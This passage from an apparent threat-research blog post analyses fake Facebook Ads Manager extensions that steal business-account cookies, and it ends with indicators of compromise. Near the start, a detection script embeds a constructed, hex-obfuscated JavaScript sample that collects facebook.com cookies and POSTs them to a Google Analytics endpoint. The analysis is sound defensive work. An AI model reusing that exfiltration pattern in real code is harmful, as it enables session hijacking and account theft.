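    findings["suspicious"] = bool(findings["cookie_dump"] and findings["ga_beacon"]
                                  and "cookies" in findings["risky_permissions"])
    return findings

def _hexify(s: str) -> str:
    """Builds the constructed sample below in the obfuscated style; not part of the check."""
    return "".join(f"\\x{ord(c):02x}" for c in s)

# Constructed stand-in for an unpacked extension posing as a translator (not the real sample).
SAMPLE_MANIFEST = {"name": "Google Translate", "manifest_version": 3,
                   "permissions": ["cookies", "storage"], "host_permissions": ["*://*.facebook.com/*"]}
SAMPLE_SCRIPTS = {
    "background.js": 'chrome["%s"]["%s"]({"domain": "%s"}, send);' % (_hexify("cookies"), _hexify("getAll"), _hexify(".facebook.com"))
                     + ' fetch("%s", {method: "POST", body: payload});' % _hexify("https://www.google-analytics.com/collect"),
    "popup.js": 'document.title = "%s";' % _hexify("Translate"),
}
```

A real-world run would read manifest.json and every .js file from the unpacked directory into the two dictionaries; a match on the beacon alone is weak evidence, since legitimate extensions do use Google Analytics.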

Accidental leak

In total, we identified over 20 different malicious Facebook Ad Manager archives that either installed Chrome extensions or relied on traditional malware executables. While there are variations between samples, the attackers’ main goal appears to be the same, namely to collect Facebook business accounts.

While investigating a new phishing site, we saw an archive for download that looked quite different from the others. Ironically, it seems the threat actors made a mistake: instead of uploading the payload, they leaked their own stolen data, or rather the data they had stolen from victims.

The site we came across pretends to be Meta Ads Manager and boasts the same claims of increasing ad performance that we’ve seen before. There is a button to download a file called Meta Ads Manager.rar which is hosted on Google Drive.

However, this archive does not contain the expected MSI installer, but instead several text files that were last modified on June 15:

While the file names are self-explanatory, we can see that they contain information about authentication (checkpoint, cookie, token). There is also information about the threat actor who shared this file (file owner) via Google Drive and their Gmail email address (this information has been passed to Meta for further action).

The first row of the file called List_ADS_Tach.txt contains column headers with some names in Vietnamese, confirming the nationality of the individuals behind these attacks. In total, there are 828 rows, which translates into just as many Facebook accounts that were breached.

As expected, the threat actors are particularly interested in their victims’ advertising accounts. We can see different metrics related to ad budget (column titles were translated from Vietnamese and may be slightly inaccurate) as well as currencies:

Prized accounts will be those that have a large remaining balance for ad spend. While we do not know if this threat actor is directly associated with DuckTail, they have the same motives of financial profit from hacked Facebook business accounts.

Finally, by converting the data into a map, we can see that victims are not confined to a particular geolocation; in fact, they are distributed worldwide.

The threat actors realized their mistake a few days later and deleted the file from their Google Drive account. They also updated the download link on the phishing site with a new file hosted via MediaFire (fortunately for users, the file was detected as malware and the download is blocked).

A low cost, high yield threat

Business users may be tempted to optimize their ad campaigns on Facebook by clicking on certain posts and downloading programs that claim to increase their earnings. This is, however, a very dangerous practice even if (or especially if) the instructions claim that the software is secure and free of malware. Remember that there is no silver bullet and anything that sounds too good to be true may very well be a scam in disguise.

Fraudsters have a lot of time on their hands and spend years studying and understanding how to abuse social media and cloud platforms, where it is a constant arms race to keep bad actors out. Based on reports highlighted in TechCrunch’s recent article, the threat actors may also reinvest some of the stolen ad budgets to place malicious ads that ensnare more victims, perpetuating this cycle.

If you did happen to download one of those malicious Facebook Ad Manager installers, Malwarebytes has your back. We were already picking up several components from these campaigns and have added additional protection for optimal detection coverage. Victims will also want to revoke access for any unknown users the fraudsters may have added to their Business Manager account profile, as well as review their transaction history.

We would like to thank Meta for being receptive to our report and helping to keep users safe.

Indicators of Compromise

Decoy site

fbadmanage[.]info

RAR archives (password 888 or 999)

Analyzed MSI file

fd637520a9ca34f7b4b21164581a4ec498bf106ba168b5cb9fcd54b5c2caafd0
